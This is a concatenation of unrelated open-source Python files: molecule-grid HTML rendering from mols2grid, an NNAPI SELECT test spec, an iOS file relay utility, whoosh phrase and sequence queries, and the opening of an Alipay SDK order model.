if not isinstance(name, str):
raise TypeError(
f"`name` must be a string. Currently of type {type(name).__name__}")
Draw.rdDepictor.SetPreferCoordGen(coordGen)
if isinstance(df, pd.DataFrame):
dataframe = df.copy()
else:
# list of dicts or other input formats for dataframes
dataframe = pd.DataFrame(df)
mapping = kwargs.pop("mapping", None)
if mapping:
warnings.warn(
"`mapping` is deprecated and will be removed soon. Consider "
"using `rename` in the future."
)
rename = rename or mapping
if rename:
dataframe.rename(columns=rename, inplace=True)
self._extra_columns = ["img", "mols2grid-id"]
# generate temporary RDKit molecules
if smiles_col and not mol_col:
mol_col = "mol"
keep_mols = False
dataframe[mol_col] = dataframe[smiles_col].apply(Chem.MolFromSmiles)
else:
keep_mols = True
# remove hydrogens
if removeHs:
dataframe[mol_col] = dataframe[mol_col].apply(Chem.RemoveHs)
if not use_coords:
dataframe[mol_col] = dataframe[mol_col].apply(remove_coordinates)
# generate smiles col
if mol_col and (smiles_col not in dataframe.columns):
dataframe[smiles_col] = dataframe[mol_col].apply(mol_to_smiles)
# add index
dataframe["mols2grid-id"] = list(range(len(dataframe)))
# drop None
dataframe.dropna(axis=0, subset=[mol_col], inplace=True)
# generate drawings
self.useSVG = useSVG
opts = MolDrawOptions or Draw.MolDrawOptions()
for key, value in kwargs.items():
setattr(opts, key, value)
self.MolDrawOptions = opts
self._MolDraw2D = Draw.MolDraw2DSVG if useSVG else Draw.MolDraw2DCairo
self.img_size = size
dataframe["img"] = dataframe[mol_col].apply(self.mol_to_img)
if keep_mols:
self.dataframe = dataframe
else:
self.dataframe = dataframe.drop(columns=mol_col)
mol_col = None
self.smiles_col = smiles_col
self.mol_col = mol_col
# register instance
self._grid_id = name
register._init_grid(name)
@classmethod
def from_mols(cls, mols, **kwargs):
"""Set up the dataframe used by mols2grid directly from a list of RDKit
molecules
Parameters
----------
mols : list
List of RDKit molecules
kwargs : object
Other arguments passed on initialization
"""
mol_col = kwargs.pop("mol_col", "mol")
df = pd.DataFrame([mol_to_record(mol, mol_col=mol_col)
for mol in mols])
return cls(df, mol_col=mol_col, **kwargs)
@classmethod
def from_sdf(cls, sdf_file, **kwargs):
"""Set up the dataframe used by mols2grid directly from an SDFile
Parameters
----------
sdf_file : str
Path to the SDF file
kwargs : object
Other arguments passed on initialization
"""
mol_col = kwargs.pop("mol_col", "mol")
df = sdf_to_dataframe(sdf_file, mol_col=mol_col)
return cls(df, mol_col=mol_col, **kwargs)
@property
def template(self):
"""Kind of grid displayed, one of:
- pages
- table
"""
return self._template
@template.setter
def template(self, value):
if value not in ["pages", "table"]:
raise ValueError(f"template={value!r} not supported. "
"Use one of 'pages' or 'table'")
self._template = value
def draw_mol(self, mol):
"""Draw a molecule"""
d2d = self._MolDraw2D(*self.img_size)
d2d.SetDrawOptions(self.MolDrawOptions)
hl_atoms = getattr(mol, "__sssAtoms", [])
d2d.DrawMolecule(mol, highlightAtoms=hl_atoms)
d2d.FinishDrawing()
return d2d.GetDrawingText()
def mol_to_img(self, mol):
"""Convert an RDKit mol to an HTML image containing a drawing of the
molecule"""
img = self.draw_mol(mol)
if self.useSVG:
return img
data = b64encode(img).decode()
return f'<img src="data:image/png;base64,{data}">'
def render(self, template="pages", **kwargs):
"""Returns the HTML document corresponding to the "pages" or "table"
template. See `to_pages` and `to_table` for the list of arguments
Parameters
----------
template : str
Kind of grid to draw:
* "table" is a very simple table where all molecules are
                  displayed on the document, the main use case is printing to
PDF or on paper.
* "pages" is a more interactive version that splits the
original data into several pages.
"""
self.template = template
return getattr(self, f"to_{self.template}")(**kwargs)
def to_pages(self, subset=None, tooltip=None,
cell_width=160, n_cols=5, n_rows=3,
border="1px solid #cccccc", gap=0,
fontsize="12pt", fontfamily="'DejaVu', sans-serif",
textalign="center", tooltip_fmt="<strong>{key}</strong>: {value}",
tooltip_trigger="click hover", tooltip_placement="bottom",
hover_color="#e7e7e7", style=None, selection=True, transform=None,
custom_css=None, custom_header=None, callback=None, sort_by=None):
"""Returns the HTML document for the "pages" template
Parameters
----------
subset : list or None
Columns to be displayed in each cell of the grid. Each
column's value will be displayed from top to bottom in the same
order given here. Use `"img"` for the image of the molecule.
Default: all columns (with "img" in first position)
tooltip : list or None
Columns to be displayed as a tooltip when hovering/clicking on the
image of a cell. Use `None` for no tooltip.
tooltip_fmt : str
Format string of each key/value pair in the tooltip
tooltip_trigger : str
Sequence of triggers for the tooltip: (click, hover, focus)
tooltip_placement : str
Position of the tooltip: auto, top, bottom, left, right
n_cols : int
Number of columns per page
n_rows : int
Number of rows per page
border : str
Styling of the border around each cell (CSS)
gap : int
Size of the margin around each cell (CSS)
fontsize : str
Font size of the text displayed in each cell (CSS)
fontfamily : str
Font used for the text in each cell (CSS)
textalign : str
Alignment of the text in each cell (CSS)
hover_color : str
Background color when hovering a cell (CSS)
style : dict or None
CSS styling applied to specific items in all cells. The dict must follow a
`key: function` structure where the key must correspond to one of
the columns in `subset` or `tooltip`. The function takes the item's value as
input, and outputs a valid CSS styling, for example
`style={"Solubility": lambda x: "color: red" if x < -5 else ""}`
if you want to color the text corresponding to the "Solubility"
column in your dataframe. You can also style a whole cell using the `__all__`
key, the corresponding function then has access to all values for each cell:
`style={"__all__": lambda x: "color: red" if x["Solubility"] < -5 else ""}`
selection : bool
Enables the selection of molecules and displays a checkbox at the top of each
            cell. This is only useful in the context of a Jupyter notebook, which gives
you access to your selection (index and SMILES) through
`mols2grid.get_selection()`
transform : dict or None
Functions applied to specific items in all cells. The dict must follow a
`key: function` structure where the key must correspond to one of the columns
in `subset` or `tooltip`. The function takes the item's value as input and
transforms it, for example:
`transform={"Solubility": lambda x: f"{x:.2f}",
"Melting point": lambda x: f"MP: {5/9*(x-32):.1f}°C"}`
will round the solubility to 2 decimals, and display the melting point in
Celsius instead of Fahrenheit with a single digit precision and some text
before (MP) and after (°C) the value. These transformations only affect
columns in `subset` and `tooltip`, and do not interfere with `style`.
custom_css : str or None
Custom CSS properties applied to the content of the HTML document
custom_header : str or None
Custom libraries to be loaded in the header of the document
callback : str or callable
JavaScript or Python callback to be executed when clicking on an image. A
dictionnary containing the data for the full cell is directly available as
`data` in JS. For Python, the callback function must have `data` as the first
argument to the function. All the values in the `data` dict are parsed as
strings, except "mols2grid-id" which is always an integer.
sort_by : str or None
Sort the grid according to the following field (which must be present in
`subset` or `tooltip`).
"""
if self.mol_col:
df = self.dataframe.drop(columns=self.mol_col).copy()
else:
df = self.dataframe.copy()
cell_width = self.img_size[0]
smiles = self.smiles_col
content = []
column_map = {}
width = n_cols * (cell_width + 2 * (gap + 2))
if subset is None:
subset = df.columns.tolist()
subset = [subset.pop(subset.index("img"))] + subset
# define fields that are searchable and sortable
search_cols = [f"data-{col}" for col in subset if col != "img"]
if tooltip:
search_cols.append("mols2grid-tooltip")
sort_cols = search_cols[:-1]
sort_cols.extend([f"data-{col}" for col in tooltip])
for col in tooltip:
if col not in subset:
s = f'<div class="data data-{col}" style="display: none;"></div>'
content.append(s)
column_map[col] = f"data-{col}"
else:
sort_cols = search_cols[:]
sort_cols = ["mols2grid-id"] + sort_cols
# get unique list but keep order
sort_cols = list(dict.fromkeys(sort_cols))
if style is None:
style = {}
if transform is None:
transform = {}
if tooltip is None:
tooltip = []
value_names = list(set(subset + [smiles] + tooltip))
value_names = [f"data-{col}" for col in value_names]
# force id, SMILES, and tooltip values to be present in the data
final_columns = subset[:]
final_columns.extend(["mols2grid-id", smiles])
if tooltip:
final_columns.extend(tooltip)
final_columns = list(set(final_columns))
        # make a copy if id shown explicitly
if "mols2grid-id" in subset:
id_name = "mols2grid-id-copy"
df[id_name] = df["mols2grid-id"]
value_names.append(f"data-{id_name}")
final_columns.append(id_name)
subset = [id_name if x == "mols2grid-id" else x for x in subset]
# organize data
for col in subset:
if col == "img" and tooltip:
s = (f'<a tabindex="0" class="data data-{col} mols2grid-tooltip" '
'data-toggle="popover" data-content="foo"></a>')
else:
if style.get(col):
s = f'<div class="data data-{col} style-{col}" style=""></div>'
else:
s = f'<div class="data data-{col}"></div>'
content.append(s)
column_map[col] = f"data-{col}"
# add but hide SMILES div if not present
if smiles not in (subset + tooltip):
s = f'<div class="data data-{smiles}" style="display: none;"></div>'
content.append(s)
column_map[smiles] = f"data-{smiles}"
# set mapping for list.js
if "__all__" in style.keys():
whole_cell_style = True
x = "[{data: ['mols2grid-id', 'cellstyle']}, "
else:
whole_cell_style = False
x = "[{data: ['mols2grid-id']}, "
value_names = x + str(value_names)[1:]
# apply CSS styles
for col, func in style.items():
if col == "__all__":
name = "cellstyle"
df[name] = df.apply(func, axis=1)
else:
name = f"style-{col}"
df[name] = df[col].apply(func)
final_columns.append(name)
value_names = value_names[:-1] + f", {{ attr: 'style', name: {name!r} }}]"
if tooltip:
df["mols2grid-tooltip"] = df.apply(tooltip_formatter, axis=1,
args=(tooltip, tooltip_fmt, style,
transform))
final_columns = final_columns + ["mols2grid-tooltip"]
value_names = (value_names[:-1] +
", {attr: 'data-content', name: 'mols2grid-tooltip'}]")
# apply custom user function
for col, func in transform.items():
df[col] = df[col].apply(func)
if selection:
checkbox = '<input type="checkbox" class="position-relative float-left">'
else:
checkbox = ""
if whole_cell_style:
item = ('<div class="cell" data-mols2grid-id="0" '
'data-cellstyle="0">{checkbox}{content}</div>')
else:
item = ('<div class="cell" data-mols2grid-id="0">'
'{checkbox}{content}</div>')
item = item.format(checkbox=checkbox, content="".join(content))
# callback
if callable(callback):
if callback.__name__ == "<lambda>":
raise TypeError(
"Lambda functions are not supported as callbacks. Please "
"use a regular function instead.")
callback_type = "python"
callback = callback.__name__
else:
callback_type = "js"
if sort_by and sort_by != "mols2grid-id":
if sort_by in (subset + tooltip):
sort_by = f"data-{sort_by}"
else:
raise ValueError(f"{sort_by} is not an available field in "
"`subset` or `tooltip`")
else:
sort_by = "mols2grid-id"
df = df[final_columns].rename(columns=column_map).sort_values(sort_by)
template = env.get_template('pages.html')
template_kwargs = dict(
width = width,
border = border,
textalign = textalign,
cell_width = cell_width,
fontfamily = fontfamily,
fontsize = fontsize,
gap = gap,
hover_color = hover_color,
item = item,
item_repr = repr(item),
value_names = value_names,
tooltip = tooltip,
tooltip_trigger = repr(tooltip_trigger),
tooltip_placement = repr(tooltip_placement),
n_items_per_page = n_rows * n_cols,
search_cols = search_cols,
data = json.dumps(df.to_dict("records")),
selection = selection,
smiles_col = smiles,
sort_cols = sort_cols,
grid_id = self._grid_id,
whole_cell_style = whole_cell_style,
custom_css = custom_css or "",
custom_header = custom_header or "",
callback = callback,
callback_type = callback_type,
sort_by = sort_by,
)
return template.render(**template_kwargs)
def get_selection(self):
"""Retrieve the dataframe subset corresponding to your selection
Returns
-------
pandas.DataFrame
"""
sel = list(register.get_selection().keys())
return (self.dataframe.loc[self.dataframe["mols2grid-id"].isin(sel)]
.drop(columns=self._extra_columns))
def filter(self, mask):
"""Filters the grid using a mask (boolean array)
Parameters
----------
mask : list, pd.Series, np.ndarray
Boolean array: `True` when the item should be displayed, `False` if it should
be filtered out.
"""
# convert mask to mols2grid-id
ids = self.dataframe.loc[mask]["mols2grid-id"]
return self._filter_by_id(ids)
def filter_by_index(self, indices):
"""Filters the grid using the dataframe's index"""
# convert index to mols2grid-id
ids = self.dataframe.loc[self.dataframe.index.isin(indices)]["mols2grid-id"]
return self._filter_by_id(ids)
def _filter_by_id(self, ids):
"""Filters the grid using the values in the `mols2grid-id` column"""
if isinstance(ids, (pd.Series, np.ndarray)):
ids = ids.to_list()
code = env.get_template('js/filter.js').render(
grid_id = self._grid_id,
ids = ids)
return Javascript(code)
def to_table(self, subset=None, tooltip=None, n_cols=6,
cell_width=160, border="1px solid #cccccc", gap=0,
fontsize="12pt", fontfamily="'DejaVu', sans-serif",
textalign="center", tooltip_fmt="<strong>{key}</strong>: {value}",
tooltip_trigger="click hover", tooltip_placement="bottom",
hover_color="#e7e7e7", style=None, transform=None):
"""Returns the HTML document for the "table" template
Parameters
----------
subset : list or None
Columns to be displayed in each cell of the grid. Each
column's value will be displayed from top to bottom in the same
order given here. Use `"img"` for the image of the molecule.
Default: all columns (with "img" in first position)
tooltip : list or None
Columns to be displayed as a tooltip when hovering/clicking on the
image of a cell. Use `None` for no tooltip.
tooltip_fmt : str
Format string of each key/value pair in the tooltip
tooltip_trigger : str
Sequence of triggers for the tooltip: (click, hover, focus)
tooltip_placement : str
Position of the tooltip: auto, top, bottom, left, right
n_cols : int
Number of columns in the table
border : str
Styling of the border around each cell (CSS)
gap : int or str
Size of the margin around each cell (CSS)
fontsize : str
Font size of the text displayed in each cell (CSS)
fontfamily : str
Font used for the text in each cell (CSS)
textalign : str
Alignment of the text in each cell (CSS)
hover_color : str
Background color when hovering a cell (CSS)
style : dict or None
CSS styling applied to specific items in all cells. The dict must follow a
`key: function` structure where the key must correspond to one of
the columns in `subset` or `tooltip`. The function takes the item's value as
input, and outputs a valid CSS styling, for example
`style={"Solubility": lambda x: "color: red" if x < -5 else "color: black"}`
if you want to color the text corresponding to the "Solubility"
column in your dataframe
transform : dict or None
Functions applied to specific items in all cells. The dict must follow a
`key: function` structure where the key must correspond to one of the columns
in `subset`. The function takes the item's value as input and transforms it,
for example:
`transform={"Solubility": lambda x: f"{x:.2f}",
"Melting point": lambda x: f"MP: {5/9*(x-32):.1f}°C"}`
will round the solubility to 2 decimals, and display the melting point in
Celsius instead of Fahrenheit with a single digit precision and some text
before (MP) and after (°C) the value. These transformations only affect
columns in `subset` and `tooltip`, and are applied independently of `style`
"""
tr = []
data = []
df = self.dataframe
cell_width = self.img_size[0]
if subset is None:
subset = df.columns.tolist()
subset = [subset.pop(subset.index("img"))] + subset
if style is None:
style = {}
if transform is None:
transform = {}
for i, row in df.iterrows():
ncell = i + 1
nrow, ncol = divmod(i, n_cols)
td = [f'<td class="col-{ncol}">']
if "__all__" in style.keys():
s = style["__all__"](row)
div = [f'<div class="cell-{i}" style="{s}">']
else:
div = [f'<div class="cell-{i}">']
for col in subset:
v = row[col]
if col == "img" and tooltip:
popover = tooltip_formatter(row, tooltip, tooltip_fmt, style,
transform)
func = transform.get(col)
v = func(v) if func else v
item = (f'<div class="data data-{col} mols2grid-tooltip" data-toggle="popover" '
f'data-content="{escape(popover)}">{v}</div>')
else:
func = style.get(col)
if func:
item = f'<div class="data data-{col}" style="{func(v)}">'
else:
item = f'<div class="data data-{col}">'
func = transform.get(col)
v = func(v) if func else v
item += f'{v}</div>'
div.append(item)
div.append("</div>")
td.append("\n".join(div))
td.append("</td>")
tr.append("\n".join(td))
if (ncell % n_cols == 0) or (ncell == len(df)):
cell = [f'<tr class="row-{nrow}">']
cell.append("\n".join(tr))
cell.append("</tr>")
data.append("\n".join(cell))
tr = []
template = env.get_template('table.html')
template_kwargs = dict(
border = border,
textalign = textalign,
cell_width = cell_width,
fontfamily = fontfamily,
fontsize = fontsize,
gap = gap,
hover_color = hover_color,
tooltip = tooltip,
tooltip_trigger = repr(tooltip_trigger),
tooltip_placement = repr(tooltip_placement),
data = "\n".join(data),
)
return template.render(**template_kwargs)
@requires("IPython.display")
def display(self, width="100%", height=None, iframe_allow="clipboard-write",
**kwargs):
"""Render and display the grid in a Jupyter notebook"""
doc = self.render(**kwargs)
iframe = (env.get_template("html/iframe.html")
.render(width=width, height=height, padding=18,
allow=iframe_allow, doc=escape(doc)))
return HTML(iframe)
def save(self, output, **kwargs):
"""Render and save the grid in an HTML document"""
with open(output, "w") as f:
f.write(self.render(**kwargs))
|
tests/nnapi/specs/V1_2/select_v1_2.mod.py
|
periannath/ONE
| 255 |
70675
|
#
# Copyright (C) 2018 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
def test(name, input0, input1, input2, output0, input0_data, input1_data, input2_data, output_data):
model = Model().Operation("SELECT", input0, input1, input2).To(output0)
quant8 = DataTypeConverter().Identify({
input1: ["TENSOR_QUANT8_ASYMM", 1.5, 129],
input2: ["TENSOR_QUANT8_ASYMM", 0.5, 127],
output0: ["TENSOR_QUANT8_ASYMM", 1.0, 128],
})
example = Example({
input0: input0_data,
input1: input1_data,
input2: input2_data,
output0: output_data,
}, model=model, name=name).AddVariations("int32", "float16", "relaxed", quant8)
test(
name="one_dim",
input0=Input("input0", "TENSOR_BOOL8", "{3}"),
input1=Input("input1", "TENSOR_FLOAT32", "{3}"),
input2=Input("input2", "TENSOR_FLOAT32", "{3}"),
output0=Output("output0", "TENSOR_FLOAT32", "{3}"),
input0_data=[True, False, True],
input1_data=[1, 2, 3],
input2_data=[4, 5, 6],
output_data=[1, 5, 3],
)
test(
name="two_dim",
input0=Input("input0", "TENSOR_BOOL8", "{2, 2}"),
input1=Input("input1", "TENSOR_FLOAT32", "{2, 2}"),
input2=Input("input2", "TENSOR_FLOAT32", "{2, 2}"),
output0=Output("output0", "TENSOR_FLOAT32", "{2, 2}"),
input0_data=[False, True, False, True],
input1_data=[1, 2, 3, 4],
input2_data=[5, 6, 7, 8],
output_data=[5, 2, 7, 4],
)
test(
name="five_dim",
input0=Input("input0", "TENSOR_BOOL8", "{2, 1, 2, 1, 2}"),
input1=Input("input1", "TENSOR_FLOAT32", "{2, 1, 2, 1, 2}"),
input2=Input("input2", "TENSOR_FLOAT32", "{2, 1, 2, 1, 2}"),
output0=Output("output0", "TENSOR_FLOAT32", "{2, 1, 2, 1, 2}"),
input0_data=[True, False, True, False, True, False, True, False],
input1_data=[1, 2, 3, 4, 5, 6, 7, 8],
input2_data=[9, 10, 11, 12, 13, 14, 15, 16],
output_data=[1, 10, 3, 12, 5, 14, 7, 16],
)
|
filerelay.py
|
mountainstorm/MobileDevice
| 136 |
70677
|
#!/usr/bin/python
# coding: utf-8
# Copyright (c) 2013 Mountainstorm
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from MobileDevice import *
from amdevice import *
from plistservice import *
import os
class FileRelay(PlistService):
u'''Provides access to the file relay service, allowing you to retrieve
filesets from the device in cpio.gz format'''
filesets = [
u'AppleSupport',
u'Network',
u'VPN',
u'WiFi',
u'UserDatabases',
u'CrashReporter',
u'tmp',
u'SystemConfiguration'
]
def __init__(self, amdevice):
PlistService.__init__(
self,
amdevice,
[AMSVC_FILE_RELAY],
kCFPropertyListXMLFormat_v1_0
)
def get_filesets(self, sources):
u'''retrieves the fileset(s) specified in sources; returns the data
in cpio.gz format
Arguments:
sources -- an array of source names
'''
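# Hedged usage sketch (assumes `dev` is an already-connected AMDevice):
#   fr = FileRelay(dev)
#   data = fr.get_filesets([u'CrashReporter', u'tmp'])
#   open(u'filesets.cpio.gz', 'wb').write(data)
#   fr.disconnect()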
self._sendmsg({u'Sources': sources})
reply = self._recvmsg()
if u'Status' in reply and reply[u'Status'] == u'Acknowledged':
# now read the cpio.gz file it returns
retval = ''
while True:
data = os.read(self.s, 1024)
if data is None or len(data) == 0:
break
retval += data
else:
raise RuntimeError(u'Unable to retrieve filesets: %s' % reply)
return retval
def register_argparse_filerelay(cmdargs):
import argparse
import sys
def cmd_filerelay(args, dev):
fr = FileRelay(dev)
sets = FileRelay.filesets
if args.s is not None:
sets = []
for s in args.s:
sets.append(s.decode(u'utf-8'))
f = open(args.dest.decode(u'utf-8'), 'wb')
f.write(fr.get_filesets(sets))
f.close()
fr.disconnect()
# filerelay command
filerelaycmd = cmdargs.add_parser(
u'filerelay',
help=u'retrieves filesets from the device in .cpio.gz format'
)
filerelaycmd.add_argument(
u'-s',
metavar=u'setname',
action=u'append',
help=u'the set name to retrieve; if no -s options are specified it retrieves all sets'
)
filerelaycmd.add_argument(
u'dest',
help=u'destination filename; should really end in .cpio.gz'
)
filerelaycmd.set_defaults(func=cmd_filerelay)
|
src/whoosh/query/positional.py
|
matchup-ir/whooshy
| 270 |
70689
|
<reponame>matchup-ir/whooshy
# Copyright 2007 <NAME>. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY MATT CHAPUT ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL MATT CHAPUT OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are
# those of the authors and should not be interpreted as representing official
# policies, either expressed or implied, of Matt Chaput.
from __future__ import division
import copy
from whoosh import matching
from whoosh.analysis import Token
from whoosh.compat import u
from whoosh.query import qcore, terms, compound
class Sequence(compound.CompoundQuery):
"""Matches documents containing a list of sub-queries in adjacent
positions.
This object has no sanity check to prevent you from using queries in
different fields.
"""
JOINT = " NEAR "
intersect_merge = True
def __init__(self, subqueries, slop=1, ordered=True, boost=1.0):
"""
:param subqueries: a list of :class:`whoosh.query.Query` objects to
match in sequence.
:param slop: the maximum difference in position allowed between the
subqueries.
:param ordered: if True, the position differences between subqueries
must be positive (that is, each subquery in the list must appear
after the previous subquery in the document).
:param boost: a boost factor to add to the score of documents matching
this query.
"""
compound.CompoundQuery.__init__(self, subqueries, boost=boost)
self.slop = slop
self.ordered = ordered
def __eq__(self, other):
return (other and type(self) is type(other)
and self.subqueries == other.subqueries
and self.boost == other.boost)
def __repr__(self):
return "%s(%r, slop=%d, boost=%f)" % (self.__class__.__name__,
self.subqueries, self.slop,
self.boost)
def __hash__(self):
h = hash(self.slop) ^ hash(self.boost)
for q in self.subqueries:
h ^= hash(q)
return h
def normalize(self):
# Because the subqueries are in sequence, we can't do the fancy merging
# that CompoundQuery does
return self.__class__([q.normalize() for q in self.subqueries],
self.slop, self.ordered, self.boost)
def _and_query(self):
return compound.And(self.subqueries)
def estimate_size(self, ixreader):
return self._and_query().estimate_size(ixreader)
def estimate_min_size(self, ixreader):
return self._and_query().estimate_min_size(ixreader)
def _matcher(self, subs, searcher, context):
from whoosh.query.spans import SpanNear
# Tell the sub-queries this matcher will need the current match to get
# spans
context = context.set(needs_current=True)
m = self._tree_matcher(subs, SpanNear.SpanNearMatcher, searcher,
context, None, slop=self.slop,
ordered=self.ordered)
return m
class Ordered(Sequence):
"""Matches documents containing a list of sub-queries in the given order.
"""
JOINT = " BEFORE "
def _matcher(self, subs, searcher, context):
from whoosh.query.spans import SpanBefore
return self._tree_matcher(subs, SpanBefore._Matcher, searcher,
context, None)
class Phrase(qcore.Query):
"""Matches documents containing a given phrase."""
def __init__(self, fieldname, words, slop=1, boost=1.0, char_ranges=None):
"""
:param fieldname: the field to search.
:param words: a list of words (unicode strings) in the phrase.
:param slop: the number of words allowed between each "word" in the
phrase; the default of 1 means the phrase must match exactly.
:param boost: a boost factor to apply to the raw score of
documents matched by this query.
:param char_ranges: if a Phrase object is created by the query parser,
it will set this attribute to a list of (startchar, endchar) pairs
corresponding to the words in the phrase
"""
self.fieldname = fieldname
self.words = words
self.slop = slop
self.boost = boost
self.char_ranges = char_ranges
def __eq__(self, other):
return (other and self.__class__ is other.__class__
and self.fieldname == other.fieldname
and self.words == other.words
and self.slop == other.slop
and self.boost == other.boost)
def __repr__(self):
return "%s(%r, %r, slop=%s, boost=%f)" % (self.__class__.__name__,
self.fieldname, self.words,
self.slop, self.boost)
def __unicode__(self):
return u('%s:"%s"') % (self.fieldname, u(" ").join(self.words))
__str__ = __unicode__
def __hash__(self):
h = hash(self.fieldname) ^ hash(self.slop) ^ hash(self.boost)
for w in self.words:
h ^= hash(w)
return h
def has_terms(self):
return True
def terms(self, phrases=False):
if phrases and self.field():
for word in self.words:
yield (self.field(), word)
def tokens(self, boost=1.0):
char_ranges = self.char_ranges
startchar = endchar = None
for i, word in enumerate(self.words):
if char_ranges:
startchar, endchar = char_ranges[i]
yield Token(fieldname=self.fieldname, text=word,
boost=boost * self.boost, startchar=startchar,
endchar=endchar, chars=True)
def normalize(self):
if not self.words:
return qcore.NullQuery
if len(self.words) == 1:
t = terms.Term(self.fieldname, self.words[0])
if self.char_ranges:
t.startchar, t.endchar = self.char_ranges[0]
return t
words = [w for w in self.words if w is not None]
return self.__class__(self.fieldname, words, slop=self.slop,
boost=self.boost, char_ranges=self.char_ranges)
def replace(self, fieldname, oldtext, newtext):
q = copy.copy(self)
if q.fieldname == fieldname:
for i, word in enumerate(q.words):
if word == oldtext:
q.words[i] = newtext
return q
def _and_query(self):
return compound.And([terms.Term(self.fieldname, word)
for word in self.words])
def estimate_size(self, ixreader):
return self._and_query().estimate_size(ixreader)
def estimate_min_size(self, ixreader):
return self._and_query().estimate_min_size(ixreader)
def matcher(self, searcher, context=None):
from whoosh.query import Term, SpanNear2
fieldname = self.fieldname
if fieldname not in searcher.schema:
return matching.NullMatcher()
field = searcher.schema[fieldname]
if not field.format or not field.format.supports("positions"):
raise qcore.QueryError("Phrase search: %r field has no positions"
% self.fieldname)
terms = []
# Build a list of Term queries from the words in the phrase
reader = searcher.reader()
for word in self.words:
try:
word = field.to_bytes(word)
except ValueError:
return matching.NullMatcher()
if (fieldname, word) not in reader:
# Shortcut the query if one of the words doesn't exist.
return matching.NullMatcher()
terms.append(Term(fieldname, word))
# Create the equivalent SpanNear2 query from the terms
q = SpanNear2(terms, slop=self.slop, ordered=True, mindist=1)
# Get the matcher
m = q.matcher(searcher, context)
if self.boost != 1.0:
m = matching.WrappingMatcher(m, boost=self.boost)
return m
|
alipay/aop/api/domain/AlipayBusinessOrderScenicTrafficSyncModel.py
|
antopen/alipay-sdk-python-all
| 213 |
70690
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.ScenicTrafficUserInfo import ScenicTrafficUserInfo
from alipay.aop.api.domain.ScenicExtInfo import ScenicExtInfo
from alipay.aop.api.domain.ScenicTrafficTicketInfo import ScenicTrafficTicketInfo
class AlipayBusinessOrderScenicTrafficSyncModel(object):
def __init__(self):
self._amount = None
self._app_name = None
self._appid = None
self._contact = None
self._discount_amount = None
self._ext_info = None
self._order_create_time = None
self._order_id = None
self._order_link = None
self._order_modified_time = None
self._order_pay_time = None
self._order_source = None
self._order_status = None
self._outer_order_id = None
self._pay_amount = None
self._payment_method = None
self._refund_amount = None
self._refund_status = None
self._refund_ticket_num = None
self._refund_time = None
self._ticket_info = None
self._trade_no = None
self._uid = None
@property
def amount(self):
return self._amount
@amount.setter
def amount(self, value):
self._amount = value
@property
def app_name(self):
return self._app_name
@app_name.setter
def app_name(self, value):
self._app_name = value
@property
def appid(self):
return self._appid
@appid.setter
def appid(self, value):
self._appid = value
@property
def contact(self):
return self._contact
@contact.setter
def contact(self, value):
if isinstance(value, ScenicTrafficUserInfo):
self._contact = value
else:
self._contact = ScenicTrafficUserInfo.from_alipay_dict(value)
@property
def discount_amount(self):
return self._discount_amount
@discount_amount.setter
def discount_amount(self, value):
self._discount_amount = value
@property
def ext_info(self):
return self._ext_info
@ext_info.setter
def ext_info(self, value):
if isinstance(value, ScenicExtInfo):
self._ext_info = value
else:
self._ext_info = ScenicExtInfo.from_alipay_dict(value)
@property
def order_create_time(self):
return self._order_create_time
@order_create_time.setter
def order_create_time(self, value):
self._order_create_time = value
@property
def order_id(self):
return self._order_id
@order_id.setter
def order_id(self, value):
self._order_id = value
@property
def order_link(self):
return self._order_link
@order_link.setter
def order_link(self, value):
self._order_link = value
@property
def order_modified_time(self):
return self._order_modified_time
@order_modified_time.setter
def order_modified_time(self, value):
self._order_modified_time = value
@property
def order_pay_time(self):
return self._order_pay_time
@order_pay_time.setter
def order_pay_time(self, value):
self._order_pay_time = value
@property
def order_source(self):
return self._order_source
@order_source.setter
def order_source(self, value):
self._order_source = value
@property
def order_status(self):
